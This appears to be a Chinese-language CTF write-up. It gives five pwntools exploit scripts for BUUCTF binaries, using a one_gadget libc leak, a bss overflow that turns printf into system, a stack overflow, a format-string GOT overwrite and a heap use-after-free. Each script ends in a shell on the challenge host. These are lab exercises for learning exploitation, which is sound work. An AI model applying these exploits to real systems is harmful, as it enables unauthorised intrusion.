1.onegadget

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',25018)
else:
	io=process('./one_gadget')
libc=ELF('/mnt/hgfs/pwn/0-靶场/0-buuctf/libc/libc-2.29.so')
printf=int(io.recvline()[-15:-1],16)
log.success('printf_leak==>'+hex(printf))
libc_base=printf-libc.sym['printf']
log.success('libc_base==>'+hex(libc_base))
one_gadget=libc_base+0x106ef8
io.sendafter('gadget:',str(one_gadget))
io.interactive()

2.secret

  • 这题开始没看注意到printf那边到buf,然后看到TTY师傅的脚本突然开窍,借其exp,大致思路是通过name那边的bss溢出,修改计数那边的指针,然后通过发送正确的secret来使指针减少为system。然后在printf那边就变成system(/bin/sh)了。
from pwn import*
context.log_level = 'debug'
#p = process('./secret')
p = remote('node3.buuoj.cn',25764)

elf = ELF('./secret')
log.success('printf_got==>'+hex(elf.got['printf']))
log.success('system_got==>'+hex(elf.got['system']))
def function(index):
	#p.recv()
	p.sendline(str(index))
	sleep(0.5)
p.recv()
payload = '/bin/sh\x00'+'a'*8+'\x40'+'\xd0'+'\x46'
p.sendline(payload)
function(0x476B)
function(0x2D38)
function(0x4540)
function(0x3E77)
function(0x3162)
function(0x3F7D)
function(0x357A)
function(0x3CF5)
function(0x2F9E)
function(0x41EA)
function(0x48D8)
function(0x2763)
function(0x474C)
function(0x3809)
function(0x2E63)
p.sendline('1')
#function(0x2F4A)
#gdb.attach(p,'b *0x401346')
# buf 0x46D080
p.interactive()

3.r2t3

  • 整数溢出。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',27142)
else:
	io=process('./r2t3')
system=0x804858e
payload ='a'*0x15+p32(system)
payload=payload.ljust(0x400,'a')
#gdb.attach(io)
#pause()
io.sendafter('name:',payload)
io.interactive()

4.r2t4

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',29103)
else:
	io=process('./r2t4')
elf=ELF('./r2t4')
backdoor=0x400626
check=0x601018
#payload ='%7$p'.ljust(8,'a')+'aaaaaaaa'
payload ='%'+str(backdoor>>16)+'c%10$hhn'
payload+='%'+str((backdoor&0xffff)-(backdoor>>16))+'c%11$hn'
payload =payload.ljust(0x20)+p64(check+2)+p64(check)
payload =payload.ljust(0x30)
#gdb.attach(io,'b *0x4006a1')
#pause()
io.sendline(payload)
print io.recvline()
io.interactive()

5.ydsneedgirlfriend2

  • 非常友好的堆题。简单的不想说。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
system=0x4006f0
if args.Q:
	io=remote('node3.buuoj.cn',26797)
else:
	io=process('./ydsneedgirlfriend2')
libc=ELF('/home/dingjie/libs/2.27-3ubuntu1_amd64/libc.so.6')
sla=lambda a,b:io.sendlineafter(a,b)
sa =lambda a,b:io.sendafter(a,b)
sl =lambda a:io.sendline(a)
ia =lambda :io.interactive()
ru =lambda a:io.recvuntil(a)
rv =lambda a:io.recv(a)

def add(sz,ct='a'):
	sla('choice :\n','1')
	sla('name:\n',str(sz))
	sa('name:\n',ct)
def dele(idx):
	sla('choice :\n','2')
	sla('Index :',str(idx))
def show(idx):
	sla('choice :\n','3')
	sla('Index :',str(idx))
	
def leak():
	add(0x10)
	dele(0)
	add(0x10,'/bin/sh\x00'+p64(system))
	show(0)
	io.interactive()
if __name__=='__main__':
	leak()